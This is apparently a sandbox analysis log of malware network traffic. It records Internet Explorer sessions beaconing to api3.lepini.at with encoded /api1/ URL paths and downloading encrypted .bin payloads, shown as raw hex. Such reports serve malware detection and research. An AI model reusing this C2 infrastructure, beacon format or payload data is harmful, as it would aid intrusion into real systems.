Feb 12, 2021 10:01:19.245045900 CET	6729	IN	Data Raw: eb f5 88 ab ff 3f 0c 75 18 1b 1d 91 15 83 a6 fd 8b ee e5 bd 0f 48 82 1c 3d 58 61 f7 66 26 f2 73 9c 5e a2 cd 4a 40 a8 52 cb 15 b9 9e 3b df e8 48 53 c5 31 f7 99 29 1a aa 5a 45 ff 53 fe d6 ce f8 d1 52 76 db d2 1d 04 1c 72 03 24 24 ea d3 f6 ed 0b a8 Data Ascii: ?uH=Xaf&s^J@R;HS1)ZESRvr$$tfK[78IZJw5nJX($B~"2"LZ YVBR6e?]<3Cb RaG;d6{(1#SVJ8\|ymf&ASxYE6*Vfy
Feb 12, 2021 10:01:19.245073080 CET	6730	IN	Data Raw: 17 e6 e3 36 d0 98 48 92 d6 8c 71 5d 6d 0c b5 89 7b f0 f8 2b 38 6c 87 33 a0 26 18 6c 19 1f b4 dd 6d a8 59 82 27 0f f4 73 73 5a 2b f2 0d 90 05 8d a8 2e f6 c3 62 40 2a 1e 51 7b e4 87 c8 26 68 a9 73 36 f0 f9 2e 79 3b b2 24 df 00 53 a1 ef 92 9a 6c d1 Data Ascii: 6Hq]m{+8l3&lmY'ssZ+.b@*Q{&hs6.y;$SlTNI#1<:'vKS;<x{vYJ0y4oO6,)\|S}P{ZL)%;eG`>yBTpCq`^7BW@O5Y-xkB6L=}
Feb 12, 2021 10:01:19.245096922 CET	6732	IN	Data Raw: e3 dd 38 4b 8e 73 21 eb 8f 06 22 3f 26 6d fe dd 16 d9 84 d9 6d 75 bd aa 6a 7a c4 48 d5 a0 29 cf 64 c2 d0 8a e9 59 26 44 95 5e c8 f4 ee 3e 75 fa f2 90 83 4f b0 03 03 da 2b a5 bf 28 4d 6a 66 36 57 4e 20 38 25 31 09 83 27 80 93 bc 6d ab 43 d9 f3 23 Data Ascii: 8Ks!"?&mmujzH)dY&D^>uO+(Mjf6WN 8%1'mC#U(SLNqv#<[Nf@"Cs \<v=*e7>mh-k\=2@NCzQ"45_sqd,g}]XdQ4TG:`phV-:t=(
Feb 12, 2021 10:01:19.245120049 CET	6733	IN	Data Raw: 96 b4 a8 52 0a 3c cc 5a a8 f6 3d 04 3b 66 9c 68 c0 67 fe ae 92 b8 bb a4 47 48 ec 76 69 69 fe ef 78 5d c3 36 e3 20 41 a3 97 30 c7 15 95 e7 56 6a 89 1f c9 09 d7 97 64 b5 c3 71 95 4b 7f 59 46 03 01 7a 66 6f ae 00 3b 4b e1 d6 3a 1b dd 21 33 78 24 d4 Data Ascii: R<Z=;fhgGHviix]6 A0VjdqKYFzfo;K:!3x$ [OVi<dnDPVv>?(UVnR)$K\,7/@sW+ue(EDe*[Mz{Uial'er^r
Feb 12, 2021 10:01:19.245147943 CET	6734	IN	Data Raw: 8d ca df 11 4f fc 21 25 23 28 d3 8c 54 2b e3 24 ac d8 5f f6 d7 0b 62 74 a2 8c 3a 67 20 ba 28 47 5a 5a 33 e8 16 02 dc 03 3f 52 a8 c0 8d 10 e2 05 5b 66 18 c7 ed 24 1e 6b c5 34 e1 94 1d 95 1d b6 33 62 b1 4f 49 9e 51 82 f1 4f 44 09 41 39 a8 3b 77 63 Data Ascii: O!%#(T+$_bt:g (GZZ3?R[f$k43bOIQODA9;wcHSpd7cQ5@'UFi!S$Z&lcFa<(: #vP\|@!cPkn6A{!dQ${Z+1Q&=HL:Ny21W
Feb 12, 2021 10:01:19.245172024 CET	6736	IN	Data Raw: 09 2f f0 20 e4 26 5b cb d4 cc e5 52 cf db 61 6b 2d 47 ec 69 dd 5e 31 72 29 9d d5 ac fa 55 ae 1b 0d 3c dc 64 67 32 b2 a3 85 c1 e3 48 e0 86 49 8c 9b 60 74 e9 51 c1 19 c6 2b 6d f5 4a 64 2e 07 6a 5e 53 1f 1f 3b ed 0a 0b ce 79 2f 2f 0e 2d 7a c0 6e e1 Data Ascii: / &[Rak-Gi^1r)U<dg2HI`tQ+mJd.j^S;y//-zn5.XR+_6}p{U[%(:]'F9~1me$QaV$;@F/Bs7EO@m+hb0I2qWje6'
Feb 12, 2021 10:01:19.245196104 CET	6737	IN	Data Raw: 7a a1 92 c2 66 9c fa 7f 43 4f 25 10 46 b1 e3 4e ee 61 73 a5 d5 db 2e dd 5d a0 6d f0 3a 12 00 0d a1 64 a0 22 6e ab 5f a2 db 1e f6 88 12 b9 8b 06 29 43 bf a4 21 7e ad 39 3f 44 c0 00 28 bf d4 9c bb 13 10 82 96 aa df 27 b6 2f a2 1d d4 73 54 39 ee 77 Data Ascii: zfCO%FNas.]m:d"n_)C!~9?D('/sT9wQ+V(FIA}DxQ8tl5m[Zo(82]UD0yoSv\:^E'f)kHuX#_.)Yg-FzNZVt?YI{sVL
Feb 12, 2021 10:01:19.245219946 CET	6739	IN	Data Raw: 5e 50 5f 4c e5 c6 31 9a 88 82 ec 6c d8 60 3e fa 75 dd 91 ad 70 ca dc 5f 9b 60 14 dd a7 fe b2 d7 4f f1 c4 60 d2 be 52 f7 0a f8 06 bd 43 ac 27 32 e1 2a b7 25 05 15 9c d6 09 5b 54 6a ae d6 30 23 2a bc ef 40 c4 c3 4a d9 ed 04 7c 6f 42 02 12 cb 05 ed Data Ascii: ^P_L1l`>up_`O`RC'2%[Tj0#@J\|oB+%lZiA-)D}ubR$%5EgDI?'f*=^8[szVr4Y'/4+{D8y^)/}Faf%#Dcn~l;+XmjUgmF}xxKHt
Feb 12, 2021 10:01:19.245243073 CET	6740	IN	Data Raw: 4e 72 9b e7 16 b5 db c8 44 a9 f7 b1 71 65 64 64 60 b1 da 0c 16 8f b8 53 d1 a2 07 c4 2c ce 07 d0 55 a2 ac 93 0a 01 aa a8 21 23 e3 97 b6 bf 91 60 da ad 15 09 b0 d1 eb 48 cd ad 94 47 28 8e bb 58 9a 48 f3 6e 83 e2 8d 01 e1 e8 5f d9 1f 69 c7 21 42 59 Data Ascii: NrDqedd`S,U!#`HG(XHn_i!BY"Rb#Y27)7P="wntU_ ?y]&L=g%Ax} Cr'nv\|&g6wHLTk?N~d>,<AHkPyhv?R
Feb 12, 2021 10:01:19.327452898 CET	6741	IN	Data Raw: 93 85 14 68 47 26 7c 67 39 3f 77 88 de d4 5c 18 30 d0 14 5e de 9a 6b e5 2c 48 b0 5e 3d e3 91 af 57 bc 3d 16 94 7d 2f 2b 88 f1 7d 3b eb e7 ad 0a 9a b3 3e 5a 07 af 45 8e 04 22 7d a2 2c 36 e1 36 62 6f d9 1c 0a bb 93 98 d7 d2 b7 80 73 e6 03 40 9d 41 Data Ascii: hG&\|g9?w\0^k,H^=W=}/+};>ZE"},66bos@AP>}U$2JgNc0eWm\|b^t]}_cI>RUM\B=6mLU#H_*tfx4l?cCFI="4<[@HErLp

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.6	49766	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 10:01:24.651830912 CET	6872	OUT	GET /api1/5I7pLP9QNe/N5buyckYCrgoPqvPA/NjC86WmFUumJ/d5ZJk2tc_2B/naCfPReUYVV3Vx/ldXi9UGRyYBJQ_2Fncfms/yLLq_2F_2FAO72XM/I_2BWOGHGpoip8O/L_2FeZA1PRI5XY_2BB/j3rs0r3Qi/LjAFf6GJs2hLttaGlvqk/QXt9zzN9fNRamdHdcye/Eig_2Fsi5CrdV1iAkxdGXk/dY8xK6yf2XhnW/0wyvHV0p/pz8P8_2FIx_2BIgHiQgkzmF/pVcGr3XY_2/F0IzfpDiL0qRGlWkz/h5CX5vmyOkVW/KUlweXnwefm/x2MMNvATag8_2F/nIODL_2BJ417QebINK55v/VFjAtH9us6H/2M HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Host: api3.lepini.at
Feb 12, 2021 10:01:25.300477982 CET	6872	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Feb 2021 09:01:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.6	49767	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 10:01:25.447871923 CET	6874	OUT	POST /api1/LMJLtOqdu8fp_2BNLOB5YBP/qly_2BfzDH/EAemu37KWi1Sk2xGU/KUNgOk1dCHS6/AgjNesC_2FL/0VRR3489g9d213/hnGFcgoP3NnJY57aNNU7X/g37VutmCLLvxlC3K/uWdTjPXn7_2BhUq/Ng_2FAVek6bgpkb4dt/OleaxmqWa/3cqZOMqKlEvnCHKOagPS/Ml3FT3Cf6J9pNtnQsAy/H2GMz5cmt0xhyUBUDbZV2P/wT6YuW4qyfVDR/pXcknYbm/8zZh_2FbRECix2oRrtcd2ZU/_2B7miWVVc/ZZTomZrPf3ghqQ7Sj/_2FENCrsSLt7/pXfjB HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Content-Length: 2 Host: api3.lepini.at
Feb 12, 2021 10:01:25.447890043 CET	6874	OUT	Data Raw: 0d 0a Data Ascii:
Feb 12, 2021 10:01:26.080135107 CET	6874	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Feb 2021 09:01:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 37 30 0d 0a f0 26 d6 4b 7c e8 0d 8d fc 76 c0 ed 58 03 52 c5 f0 3c 98 37 83 a9 72 08 e9 7c 7c 5b bc 64 87 2a 7f 10 8e 84 0f 62 4b c7 cb b9 e6 f3 2b 66 7a 4f 33 b4 55 1d 3a 21 d0 b1 30 7d 21 e0 fc ac 13 c2 23 b9 8f 07 2b b8 10 98 80 68 38 85 70 6b 10 17 c3 2f 21 4f 48 43 a9 1a 2d af e9 77 4f 8e b2 ee 51 14 3d 08 cc 06 98 5b c5 12 61 b0 7d 57 71 18 0d 0a 30 0d 0a 0d 0a Data Ascii: 70&K\|vXR<7r\|\|[d*bK+fzO3U:!0}!#+h8pk/!OHC-wOQ=[a}Wq0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.6	49768	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 10:01:26.224764109 CET	6875	OUT	GET /api1/PA66UeKSfQRT_2Fcj/iLfHO8gQWTV6/hOef_2Bpj3m/vKET8aGISBfnMY/C7Rg8qWLOVBJvNGoXa3bh/JqG7kZOU_2B7n24F/sOI2F2WFZ1YAPkN/T_2BsNeHboXzrn7jqx/15bjKyLUT/gDA9ARyVldWTTyiXOC6v/tXtwdM8cZwpPI2KIOCU/YL8nL41xllyGRALppW8L48/k1SWSYBtfCxFZ/fJXP1vjj/fSbg8F1Si24u64v54ydTM3o/jeiSZAFtwp/B6QKlmIvy6M21AUkZ/3j_2BqQ9D79g/1CFMkegOFCy/pEDZCVezoXWN_2/Bc4g_2B7Dm/6 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Host: api3.lepini.at
Feb 12, 2021 10:01:26.629220009 CET	6877	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Feb 2021 09:01:26 GMT Content-Type: application/octet-stream Content-Length: 332359 Connection: close Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: attachment; filename="602643e6834ef.bin" Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 9e 7d 4c 08 e0 c6 8a 81 e2 89 4f 03 9a 35 62 72 ba a3 ed 7e 75 ae 8e 53 6b 7c 5b 0f b1 51 44 78 ee 25 c1 d2 43 5e f5 03 14 af fd fd 9f 40 35 8f cc f0 b9 03 47 11 cf 5f 4e ea 3e 63 76 4e 30 fe 92 25 e6 f0 ee fc 55 7f 1f f4 3b d7 e8 6c 2a ac 11 d6 48 89 ea 0a da 56 54 4a ba a1 78 71 c7 c1 0d 63 96 42 9f fd 6a dc d5 a3 dc b0 c9 d1 60 73 b4 9d 1b 0a 04 ab 96 98 c9 a3 f8 d4 b2 e3 f3 86 ca 32 87 d9 bd b7 61 01 c0 b6 c5 ce 94 cb f8 07 a4 ba 8c 8f 40 fb 07 57 71 45 f5 12 8c 3e 85 11 d6 05 f6 99 15 bd e4 ca e2 8b 1b 4f f2 55 25 88 e0 41 14 60 8a 9c f3 9f 3a c5 59 cc 2f 1c f4 4f e0 e3 9b 26 e6 3e 57 42 11 53 85 d6 d3 52 62 ac f7 f9 87 33 73 f5 72 6e 88 95 50 a9 4c fc 75 63 a3 be d7 07 68 74 f1 37 b9 2d 1d c8 36 ff 09 09 46 e6 54 1f 06 ba e9 e9 aa f1 75 2f 66 74 95 b6 99 61 a0 fe da e9 1f 9b 1f 70 ef f5 74 5a 2d 73 48 c4 2c 88 0b 69 40 c8 64 b4 19 76 37 08 da 12 33 4b 7a 27 4c 4d 00 a5 ce 86 2d cd fd 27 4e 3c c1 d2 0b d3 5a 53 ba ce e5 18 c0 90 56 fb e5 1c b6 35 86 70 53 29 f0 f9 23 9c bf fb 00 ed 4e 5b a6 61 4a 4e f9 94 5c a7 c6 d3 40 b9 27 5b 1a c4 f1 e1 21 9f 14 d3 14 60 b2 09 d6 05 6c 8e 8c 93 74 cc 4b a4 10 42 2d c0 7b d8 c7 4c 20 4a 51 0d b6 fb 1e 5b 65 06 71 f2 69 bf 0b 7b bf 23 08 18 16 bf d9 02 e9 ee b1 23 63 41 d9 b3 d0 3b 79 e6 09 3e cd af 0b 7a a7 d4 70 e0 c3 c7 8c 04 f3 bc e9 4d 85 f3 07 1e 96 67 a1 66 63 29 bf 3a a7 f5 aa 18 d6 e7 7a d2 68 a6 2e 45 73 a0 69 96 b0 d6 6a 00 dc c6 a2 ae ce 64 a2 91 17 9e 56 a0 ef 28 93 ed c0 ed 7a 77 ae ca ea 58 13 49 79 49 19 73 c1 eb c4 4c fd a9 57 51 93 bd 6a 66 34 de 3b 28 94 1a 8d 22 4c 69 9d 46 f1 97 02 20 4d a9 07 e1 58 54 66 f9 12 a8 36 c8 cd 81 8b a2 aa d3 07 cb d8 db d4 2d 9e 87 de ae fc a7 5d f3 81 a6 91 e9 46 87 61 b6 08 ab 3d a8 e4 ad bf cc fb aa 48 5c d3 b7 67 90 b7 9e b9 b5 12 8b 9c ad 2f 4a 74 85 7a ad 5e de ce 2e 08 d0 0b e7 53 97 13 63 70 16 51 9f 10 d3 c4 db f4 50 9c 3a bf 49 1a 6e a9 8b 25 6e f4 28 19 86 6c a0 36 2a e0 ca c7 b7 79 3a bc 3b 60 60 93 f4 03 4e 66 ba 82 1c 2a 2f 4a d1 c9 1f 5b 3f 5e 69 b3 da 2c f3 9a 89 e8 a4 d9 7e f0 d3 02 16 a5 92 90 c2 3b f3 b0 c4 e0 e8 62 be 92 b7 27 46 23 1f 11 3d 80 0f a5 4c 4c 8c cb 90 d7 42 7f 44 8e c4 00 b3 41 5e a2 4e e0 36 3e 16 60 b0 f3 99 6a 5f ba 40 b5 57 6f a9 b8 5a 78 8d ef 2a 56 b1 22 2c 07 97 57 cd 1b 06 14 66 56 e9 7b 1e da cc 95 3b 68 04 39 e2 5b 88 27 1b 96 a7 3b a0 78 cf 33 d1 bb 60 ae a1 05 7a a5 7e b2 3a f5 9c c0 9f 8c b4 ab 3b 87 9b 30 8d 68 24 57 92 a2 88 fa d0 2a f8 fa e1 c1 94 c6 8e 27 ea 09 61 4c d9 81 22 b1 e8 59 92 ea 23 19 31 ce 58 2c f2 47 5b 7c 03 0a 9c c2 c7 c5 bf 85 f1 3a 65 43 cf dc e2 e0 ed a2 7d 85 69 e8 29 5b b2 52 53 fc 89 54 06 ec 8a 36 ef 51 61 86 59 83 64 29 dd 39 30 ea 03 cc db 74 d1 79 15 98 a5 92 1a cc 74 5c 20 c7 b7 c7 fd e0 6a ff 2b 89 69 3b 0d 4f 9c 49 26 6c 86 70 Data Ascii: }LO5br~uSk\|[QDx%C^@5G_N>cvN0%U;lHVTJxqcBj`s2a@WqE>OU%A`:Y/O&>WBSRb3srnPLucht7-6FTu/ftaptZ-sH,i@dv73Kz'LM-'N<ZSV5pS)#N[aJN\@'[!`ltKB-{L JQ[eqi{##cA;y>zpMgfc):zh.EsijdV(zwXIyIsLWQjf4;("LiF MXTf6-]Fa=H\g/Jtz^.ScpQP:In%n(l6y:;``Nf/J[?^i,~;b'F#=LLBDA^N6>`j_@WoZxV",WfV{;h9[';x3`z~:;0h$W*'aL"Y#1X,G[\|:eC}i)[RST6QaYd)90tyt\ j+i;OI&lp
Feb 12, 2021 10:01:26.629369974 CET	6878	IN	Data Raw: e9 11 34 17 a0 c4 b7 bb 7a e5 99 b1 c3 a1 b6 0a 14 fb 3d 04 97 d2 8c 17 c6 1f 3e 42 f6 0a 83 2c c7 6a c9 be 52 aa 2c 67 87 cc 87 8c 4b 8e c6 de ba 9e d7 8c e0 1f 15 f5 83 2a 8d 9d 12 a1 58 ce 7b 4e 49 1e a5 be 49 8b 04 4a 7e 5c b6 85 03 cc 03 48 Data Ascii: 4z=>B,jR,gK*X{NIIJ~\HUp>b5JoqmlHTEy)[&kNi+suR67gou SCU{'IC4K^ u3{ !{;Q}F(FOA(V`j%iq -@Q_]
Feb 12, 2021 10:01:26.629424095 CET	6879	IN	Data Raw: e1 29 01 4c 5c 86 35 ec 25 a5 4f b1 ec 8e 12 77 e9 44 7c 31 f8 f8 59 a7 15 ff 9a 88 ae 83 ee 2a 36 52 c4 03 cf 1a a1 21 e6 d0 f7 88 2a 52 96 7e 83 77 17 4b 07 68 a3 fa 24 ad 58 26 00 fb 5e 0a a6 c9 20 81 1e e9 17 4b 31 93 90 54 8c 63 2f 79 0c 57 Data Ascii: )L\5%OwD\|1Y6R!R~wKh$X&^ K1Tc/yWO fVJ{9[T~xA]WQyBGkZ}1S1?\*Co_j2~S;8=X4!j!sgV~xG@#3 PMq6BcGtwyLO]`cu+
Feb 12, 2021 10:01:26.629451036 CET	6881	IN	Data Raw: 4c 2c b6 c4 85 20 0f 4d 79 5f df c1 a0 93 7f be cc ae da 81 32 f0 d8 51 f5 18 fd 79 b5 b4 07 9a ff 89 60 51 75 e9 65 2f 91 9b 94 d3 76 ad a7 41 54 2a 56 e2 94 f2 f8 d5 63 1c fc 6c 90 89 19 aa fe 6a 4b 90 7f ea f8 f0 04 37 b8 bd bc 7e cc e4 1c dc Data Ascii: L, My_2Qy`Que/vAT*VcljK7~yjMiqE3P;cubzc`p(-@'rbk\|,P$aiCVu0JE"n8HQyAZ$v-V{sNd
Feb 12, 2021 10:01:26.629477024 CET	6882	IN	Data Raw: 67 ee 3a 4d b8 eb 34 1f ba aa 55 97 5a d4 45 9c 9f dc fd 5e f3 4a 03 b1 f6 8a 4b 99 d6 6a fd 2e 83 9f ae 66 cd 37 ce 73 35 97 20 78 93 b0 b1 f7 83 86 2a 26 c2 96 40 d5 e3 0b 34 59 c5 92 13 54 80 a9 aa d6 c2 ec 5a 3f 1d 3d 49 5e 35 4e 83 13 92 5c Data Ascii: g:M4UZE^JKj.f7s5 x*&@4YTZ?=I^5N\!}T@`?1J3Y;mfh~}Br4qP/l%F9UM5qPB\+}Pl:,"B{t h#P;PC)I\|x+Dp~Bp^}u-T:Az9s
Feb 12, 2021 10:01:26.629504919 CET	6883	IN	Data Raw: 06 7e 1a 1c a0 59 c7 bc d3 e1 00 bb d6 c1 15 d6 80 ed 41 eb 02 16 22 35 fe b9 0a 41 5c 1e 72 c6 ec cc c6 77 8f e8 6f bb 90 b7 72 f2 64 96 95 0b fc f9 59 d7 5b 88 16 58 53 22 4a 19 0c 51 4d 85 cf 63 55 59 63 ed 17 ff 37 28 9b ac 08 60 84 8c 4d f2 Data Ascii: ~YA"5A\rwordY[XS"JQMcUYc7(`M/>z4nT<KJs<D`G].81M6"B"Iio'})OWSjy>rb%s2wF'Dd3RF$?txcv;DOu%be6
Feb 12, 2021 10:01:26.629530907 CET	6885	IN	Data Raw: 22 e8 4a 76 d3 c1 62 1c 30 b5 bf db 7e ff 5a bb 94 b5 52 72 99 5f 05 ae 45 40 df e4 0d ed f3 88 fc 57 f7 ff 0e a5 50 4d a5 4f 6f 45 52 39 8d 1a 31 4e 5b 70 85 56 14 0b a3 90 be 71 9d 09 2a aa 9b fc 21 3e e5 ea 98 6c b4 b8 bb c3 73 3a cc 61 39 d5 Data Ascii: "Jvb0~ZRr_E@WPMOoER91N[pVq*!>ls:a97"Mq?GFCCb\tn"\|boE<#]~c?#iV{(%NXxZYS=B$~yRq<<k:S2Ugq8Sz7Z9N'
Feb 12, 2021 10:01:26.629556894 CET	6886	IN	Data Raw: 76 00 cd f7 4a 64 20 2e a9 10 50 c7 28 0c 64 62 c5 cd 49 00 f2 1a c9 11 5a e3 9f 2a 17 04 53 9f ae 1d 6d c0 4d c5 59 a2 30 62 be a7 c9 73 b9 2d 27 51 f5 07 c8 3d 74 2b a1 b5 28 87 8f c5 cd 19 2b 71 a4 60 4b e8 f7 36 11 67 bc 48 87 52 fa 7c 19 2c Data Ascii: vJd .P(dbIZSmMY0bs-'Q=t+(+q`K6gHR\|,D: /S3(u)-?1/L&}39 ~@D\HD@[%Z9k@ojg]3`!Hw.M+&y80m"AYxf2}hpgrXp&MxL%
Feb 12, 2021 10:01:26.629582882 CET	6887	IN	Data Raw: ea d7 c0 f9 7a 5c 2f 49 53 15 f1 25 a7 25 15 13 39 0c 14 74 70 30 e4 df c2 8a c5 d6 8c 0d 15 1d 93 2e 13 ac 72 61 dd 58 7e ce 05 09 f2 d9 80 37 93 66 d8 e7 6b cc e6 ce d2 07 77 4b 51 de 4e 53 24 a3 a7 9b 1d eb 3c 63 cd 9a cc b5 06 45 ee 7e 9e 0a Data Ascii: z\/IS%%9tp0.raX~7fkwKQNS$<cE~J&J"-kDG,m~LxJDCQ6,rOluyYPB5j1rfP81f4$Bwpczz@6)pSU^!+TE]vEi^.73
Feb 12, 2021 10:01:26.629616022 CET	6889	IN	Data Raw: af fc cf 78 4d 1b 3a 17 f7 1d f5 44 a4 0d f5 23 49 b9 6d 30 45 b2 87 b1 44 bc ec 67 0b 58 e6 cb fc 94 64 46 d8 da 9f 60 87 a2 5a fa 95 31 01 ec cf 25 8e 30 e6 55 26 4a 2e 78 e3 1c 35 dd b7 f5 9b 45 78 99 98 d0 a8 00 4f 7f 70 a2 af 82 b4 ab 53 0b Data Ascii: xM:D#Im0EDgXdF`Z1%0U&J.x5ExOpSI I-Fq&a9XW ykJD?&9cc!*~!94W]\|e6g&6O_su$l1TW_V.&U~jWm}rg)>=XdY9JP
Feb 12, 2021 10:01:26.710591078 CET	6890	IN	Data Raw: 6c 36 04 d8 3d 1e e9 d0 c5 58 5d f7 be d1 c4 85 f1 73 a5 d4 de 0b 58 7e a4 21 cc e3 7a 9a 10 ce 65 03 5f c9 d2 24 b8 a5 21 b5 b2 3f 73 e7 1d 82 7a 59 a9 7e a6 e3 09 ef c5 21 c3 ae 2d 0c 54 25 74 a5 c9 f4 c1 ec 9a f6 0a dd 28 be df 44 e7 42 0e d9 Data Ascii: l6=X]sX~!ze_$!?szY~!-T%t(DB3!^0TEok}cjouQ+Lx-tsPqaOZp[VEo%h&qwH->FYjN,)E^hCknaUW C3w

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.6	49769	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 10:01:27.651565075 CET	7220	OUT	GET /api1/YULajG8YI4XFMV/YmAg5JNx_2FDNG7TuSVBW/rDRyxARgDEEEuHQw/evIJnvp2g7SCy8L/bJrKo5atF48FzBlZet/fbl2Ha7GH/_2BH9MOFklEvfboI7qgC/aeuT1qWtgUC6wBSbBT9/_2BAmM7g9d5p3WEfySPQlF/ssCzZKRVALgEk/sp0I8w6X/DrAFLFSHvA1oX_2BP0tpKNl/ZAxxPEdckm/yZJPnbWMUA7uRge39/ml3K2b_2FU2A/XzCLaq3SmxR/10nkXEQkMm0VbN/VC8xNzQeSqT1Wl479mf3g/IZqBR2_2FJ_2BQ8j/wVSGqvItzNt/3rN HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Host: api3.lepini.at
Feb 12, 2021 10:01:28.070991993 CET	7221	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Feb 2021 09:01:28 GMT Content-Type: application/octet-stream Content-Length: 467520 Connection: close Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: attachment; filename="602643e7ef5e8.bin" Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: c1 95 b0 72 f6 a2 12 29 81 9a 6a a5 f9 d4 d5 67 e1 e6 65 8b 37 66 a0 5c e8 ce e5 f0 f5 fa 5e ce 35 57 73 80 e7 13 5a 88 85 17 38 de 80 d8 2f 24 fb 83 ee 55 a7 a7 de ce b8 50 a8 24 57 61 fb ea 71 d2 16 7f cf 16 ce 13 89 27 79 d6 e0 71 2f 95 0e 9b 27 20 86 c5 b9 1c 43 0e d3 fb 98 22 1e c1 af fa 46 a7 5f 7b 47 2c 59 1e 13 50 74 e1 6e 8b fd ae dd f8 d2 87 06 8a 2a bd 02 46 67 10 6f 89 3f 80 73 55 4e 95 43 50 42 7d 92 29 18 94 a2 3c cf a8 c7 67 7d ee 5e 20 35 d5 c8 fd d8 3c db a7 38 0e 53 c4 0f d8 6c be fd 0a 4d b6 bf 2a 1d dd 4a de f1 43 59 05 92 2f c6 53 7c 39 42 5c 04 5e 40 87 f6 94 f5 93 c2 87 9e 50 4b 17 6f bc 0d f4 bb ea 9d 8e c8 48 7a 80 b3 0b d8 80 10 53 20 da 8c 11 8f 88 25 8a ce 21 a8 a0 70 30 a4 ba cb 81 e9 a3 e8 2d b4 40 dd 54 07 1e 03 d4 97 87 15 c5 c9 50 74 22 53 e8 3f 92 cb 06 27 73 48 fb bc 27 f5 df 31 e5 41 90 a8 f4 48 39 04 94 52 ff 14 1e d3 d2 b7 ae 83 c5 78 14 ed d6 5a ac f9 71 10 0e e7 c9 e4 f6 b7 e3 c7 ae 53 ec 7e a3 19 c4 29 0d 9c 87 b1 8b fd 41 78 0f b1 f5 7f d7 33 10 7e 83 69 0c b9 a9 97 0f 1b 07 6a 79 ac e8 a4 39 8b 26 f6 8d 85 d2 b3 21 5d 71 67 9e f6 8f 84 a0 15 0b 49 34 c2 85 3e da af b5 a2 8b d2 40 63 3e 11 be e6 e6 38 d5 7d 92 61 7b c8 4e fe 67 6c 61 bf 5f a6 0f 8b 69 e3 7f db 0b d7 c6 49 65 4e 2f 08 fa 7e 7f f3 91 4f 80 75 6a 97 8e 50 fa f8 00 77 9c c0 26 70 2d 28 f1 d6 32 0a df b8 60 ea 86 02 27 23 35 fa 25 1f 99 1e 91 1c 84 c2 b4 45 72 df e7 39 d7 09 e1 75 3f a1 f4 53 b6 f9 4a 43 29 10 0b 14 31 20 1f 26 d5 8c 1c b8 34 30 d4 b7 fc 32 27 62 ad 72 e7 28 09 e7 22 d4 e1 48 e9 c4 50 df 25 f1 21 18 73 68 f9 65 e7 b7 b1 8f 01 aa fa 42 c6 9c b7 c9 d9 0e bf 68 39 f3 f6 ad 4e 40 bf 14 ba 6e 9c e1 1e fa 6f ec 97 e6 06 6b b5 4d 2d 46 22 59 dd 7e 49 65 a2 68 06 04 10 78 c4 82 0a 6e 97 45 b6 a3 6c 78 95 f1 6f 01 fc ba fd 8d 67 40 af 86 e5 e5 b9 94 4c e3 f4 a6 20 a8 ce 24 b1 bf 77 e2 78 8b c0 96 a4 0e 88 54 6d 0b 43 07 e8 c4 61 da e7 84 51 e9 a6 9a 73 81 35 19 84 d7 e4 70 2b ee 7c ff 5b a6 ce e7 f7 52 d5 89 b8 c6 96 39 ef 05 40 97 f3 d6 da dd 63 61 1f 31 0f 5c 77 29 c7 11 e3 db 10 30 d1 2c b1 cb 21 4c 66 13 79 79 2f 40 41 ce 2a 84 c1 4f d8 94 80 27 34 22 d9 11 51 80 08 32 d2 eb b1 cd 56 eb 35 57 4e 97 d1 05 ca dd 71 cf d3 9f a4 ad 75 e2 ff 77 74 09 5a e3 08 b0 1e 75 bf 58 ab 54 59 69 8d d5 f1 00 57 76 0a 08 c6 ea aa 4d 62 89 87 f0 05 d5 b4 1c 60 c7 bd 4d 97 06 5f 44 81 39 d8 08 1e c3 a6 31 e9 53 b4 a1 d4 de 48 a6 fc 9c d8 da 47 51 31 29 cf 87 d1 b3 1b b9 83 91 37 9f 71 5f f7 b3 cd bd 58 85 47 2c ce da cf 73 2c 9c 59 6d c7 aa 5c f1 30 f3 da de 07 f8 df 51 eb 71 3d a5 a2 5e 43 52 b2 90 db 1e cd 65 bb c3 ba 38 ea a5 d9 bd 48 19 73 0b 1a 